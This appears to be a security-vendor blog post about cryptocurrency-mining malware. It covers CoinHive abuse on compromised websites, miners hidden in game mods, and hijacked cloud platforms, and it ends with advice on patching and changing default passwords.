Cryptocurrency mining is an intensive task that could take huge amounts of electricity, powerful graphics cards, dedicated processors, and other hardware just to keep the operation going. Bitcoin is still the most valuable cryptocurrency (hitting a high of almost US$6,000 in the third week of October), but mining it requires serious investment to make it worthwhile.
As this report notes, underpowered rigs will spend more on electricity than what they earn in Bitcoin. And as the reward for mining a block—which are the transactions that support Bitcoin—lessen, then it gets harder to make a profit. In 2016, the reward for mining Bitcoin was halved to 12.5 BTC, and payouts are projected to decrease approximately every four years. Also, Bitcoin mining is mostly becoming an enterprise endeavor because profitable mining requires custom ASIC hardware.
Faced with these facts, many individuals may shift their cryptocurrency mining ambitions to other currencies that are considered resistant to ASIC mining to allow users with ordinary hardware to mine these with reasonable returns. It seems that cybercriminals are also moving in that direction—Bitcoin was previously the preferred currency of many in the underground, but current crypto-mining malware are mostly targeting Monero or Zcash.
With the widespread boom in cryptocurrency value, it’s no wonder that cybercriminals are continuing to develop new methods and techniques to efficiently mine cryptocurrency.
Legitimate Advertising Alternatives
CoinHive is a legitimate miner purposely developed as an alternative revenue stream for websites. Instead of peppering the site with advertisements, website owners can ask visitors to donate their processing power to fund the site through mining. A popular torrent site was one of the first major sites to adopt this. However, visitors were not warned or informed of ways to opt-out.
In response to these concerns, CoinHive put out an alternative called AuthedMine, which “enforces an explicit opt-in from the user” to run the miner. Google may also be installing a permission option in its browser so users can opt-out of mining websites.
Another concern with a legitimate miner like this is the potential for abuse. Cybercriminals can easily compromise websites with this code, like what happened with the Showtime website, or distribute it like typical malware. In September, Trend Micro discovered that the EITest campaign was actually delivering a modified CoinHive miner (detected by Trend Micro as HKTL_COINMINE) after directing users to fake tech support pages that will compromise their devices.
Malware Methods and New Techniques
Cryptocurrency mining malware are distributed through typical channels—spam mail, malicious sites, and Potentially Unwanted Apps (PUAs). Cybercriminals are also using malware to create large-scale botnets capable of mining cryptocurrency—a seemingly inefficient way to make a profit since the affected devices typically don’t have adequate capabilities to mine cryptocurrency.
The current landscape is revealing that hackers seem to be experimenting with new and different ways to exploit users. In mid-October, a Russian developer creating mods for the popular game GTA V reportedly inserted a modified XMRig miner into his mods. This allowed him to mine Monero through the PCs of the people who downloaded them.
Cloud services are also being abused to mine cryptocurrency. Just this month, there were reports of unsecured cloud platforms being hijacked to mine Monero. Researchers said that these platforms were using default credentials, which means individuals are simply taking advantage of the unsecured resources and using the processor cycles to mine alt-coins.
As cryptocurrency continues to gain value and becomes more accepted by mainstream financial institutions, we can expect cybercriminals to use different methods to compromise user’s devices to create unwilling miners. Just like with any other malware, defend against this new threat by updating systems and software with the latest security patches, and always change the default passwords on enterprise and personal devices.